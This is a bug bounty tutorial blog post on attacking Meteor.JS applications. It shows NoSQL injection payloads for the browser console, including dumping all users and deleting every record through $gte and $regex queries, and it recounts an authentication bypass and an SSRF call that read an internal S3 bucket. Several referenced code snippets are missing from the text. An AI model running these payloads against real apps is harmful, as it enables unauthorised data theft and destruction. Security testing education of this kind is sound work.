Javascript for bug bounty hunters — part 3

Ahmed Ezzat (BitTheByte)
3 min readSep 4, 2020

--

This is a follow up to https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7

Chapter 7: Attacking Meteor.JS

Chapter 7–1: Information gathering

MeteorJS is not only a frontend library it also has its own backend engine to manage the communications. Running the following commands at Chrome’s Devtools will help us to extract some useful information about the server and the working environment

Chapter 7–2: NoSQL Injection at MeteorJS apps

At the first look, this server-side code looks safe however it’s vulnerable to NoSQL Injections attacks https://resources.infosecinstitute.com/what-is-nosql-injection/

Unsafe MeteorJS code example

From the client-side, this code could be invoked using the following javascript code

This will result in removing the cart with ID=1 (server-side). nothing fancy here, However by default MeteorJS based apps accept NoSQL queries as parameters, and from the server-side code above we saw that cartId is passed directly to the .remove() so by sending (w/Chrom Console) a NoSQL query as follows

Will result in removing all carts with ID ≥ 0 effectively removing all of them. we will use some tools to help us rather than the manual method. A useful chrome extension to help you gather information and discover insecure functions https://chrome.google.com/webstore/detail/meteor-devtools/ippapidnnboiophakmmhkdlchoccbgje?hl=en.

Here is a list of javascript code to test against Metoar js applications

Meteor.users.find().fetch(); // Sometimes returns all usersMeteor.call("CustomName", {$gte: 0}) // NoSQLI case_.each(Router.routes,route=>console.log(route.getName(),route.path())); // List Routers ex. https://example.com/[Router]CollectionName.insert({ key: value }); // NoSQLI InsertCollectionName.remove({ _id: {$regex:".*?"}}); // NoSQLI Remove

Useful resources

Chapter 8: Real-life applications (2)

Chapter 8–1: Authentication Bypass

I’m not allowed to disclose this yet but here is a screenshot from the pending disclosure request

By just running this code at my chrome browser I was able to randomly access users profiles

Chapter 8–2: Server-side Request Forgery

This is also is not allowed to be disclosed ( bugcrowd’s polices for yall ). an SSRF was found at exported function named readResumeFromS3 it was intended to be internal however after some digging at the client-side code I was able to find it. invoking it resulted in a big chunk of data from the internal S3 bucket

> Meteor.call("readResumeFromS3", '', function(e, a) {console.log(e,a)})<- undefined {contentType: "application/xml", fileData: "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz…DbGFzcz48L0NvbnRlbnRzPjwvTGlzdEJ1Y2tldFJlc3VsdD4="}

The next article will discuss my general approach when testing a javascript framework and also will include some write-ups :)

--

--

Responses (1)